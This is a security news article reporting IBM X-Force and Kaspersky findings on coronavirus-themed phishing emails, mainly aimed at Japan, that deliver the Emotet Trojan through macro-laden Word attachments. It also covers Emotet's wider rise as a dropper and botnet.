Reports: Cybercriminals Using Health Emergency Messages to Spread Malware
Cybercriminals are using fake email messages about the coronavirus to spead the Emotet Trojan as well as other malware, according to reports released this week by IBM and Kaspersky.
On Thursday, the United Nation’s World Health Organization declared the coronavirus outbreak a public health emergency. The virus, which was first spotted in Wuhan, China, in December, has now spread to other nations, including the United States.
The death toll from the virus reached 213 on Friday with more than 9,600 infections being confirmed worldwide, Reuters reported, citing Chinese and World Health Organization data.
In the cases that IBM X-Force researchers have discovered, the emails, which contain malicious Microsoft Word attachments, are mainly focused on Japan. The cybercriminals spreading the Emotet Trojan apparently are attempting to target regions closer to China, where the coronavirus originated, but it’s likely that their tactics will shift to other countries in the coming weeks, according to IBM.
“We expect to see more malicious email traffic based on the coronavirus in the future, as the infection spreads,” the IBM researchers say. “In these first samples, Japanese victims were probably targeted due to their proximity to China. Unfortunately, it is quite common for threat actors to exploit basic human emotions such as fear – especially if a global event has already caused terror and panic.”
Kaspersky researchers also have found a number of spam campaigns using coronavirus warnings to target victims, according to a report shared with Information Security Media Group. In many cases, the analysts found cybercriminals attempting to deploy a number of Trojans to victims’ devices.
“So far, we have seen only 10 unique files, but as this sort of activity often happens with popular media topics, we expect that this tendency may grow,” says Anton Ivanov, a Kaspersky malware analyst. “As people continue to be worried for their health, we may see more and more malware hidden inside fake documents about the coronavirus being spread.”
In the cases from Japan, IBM analysts note that many of the emails are designed to appear to originate from a disability welfare service provider in that country.
In one email, the attackers state the coronavirus has been detected in the Gifu region of Japan, while another mentions Osaka. The attackers seem to be using specifically tailored warnings and language to scare inhabitants in these areas, making them more likely to click on the attachment, according to IBM. The emails also end with a footer that mentions a legitimate postal address as well as a phone and fax number, the IBM report states.
Email targeting victims in Japan (Source: IBM)
Each of these emails contains an attached Word document, which is portrayed as offering updates and health information, according to IBM. If the file attachment is opened and Office 365 macros enabled, however, an obfuscated VBA macro script begins running in the background, which then installs a Powershell script and downloads the Emotet Trojan, according to IBM.
“Previously, Japanese Emotet emails have been focused on corporate-style payment notifications and invoices, following a similar strategy as emails targeting European victims. This new approach to delivering Emotet may be significantly more successful, due to the wide impact of the coronavirus and the fear of infection surrounding it,” the X-Force report says.
Emotet on the Rise
Over the last several months, security researchers and government agencies have been issuing warnings about increases in Emotet attacks.
The U.S. U.S. Cybersecurity and Infrastructure Security Agency recently warned that it’s seen a surge in targeted attacks using Emotet (see: Emotet Malware Alert Sounded by US Cybersecurity Agency).
While Emotet started its life as a banking Trojan five years ago, its developers have added additional functionality, including making the malware a dropper, so that it can be used to install additional malicious code on endpoints it’s infected, as well as giving it the ability to scrape victims’ PCs for contact information. In addition, other attackers have increasingly rented Emotet botnets to install other malware, including Trickbot and various strains of ransomware, according to security researchers.
Once the malware is downloaded, Emotet uses the infected system to send out additional phishing emails and spam in an effort to grow the botnet, according to researchers at Cofense.
Emotet attackers have also previously used emails about topics in the news to spread the malware as well. In September 2019, for instance, attackers used phishing emails that claimed to contain a version of Edward Snowden’s memoir, which had been released a week prior, in an attached Microsoft Word file. Once downloaded, malicious macros in the document triggered a PowerShell command, which then downloaded Emotet malware onto the infected device (see: Emotet Botnet Now Using Snowden’s Memoir as a Lure).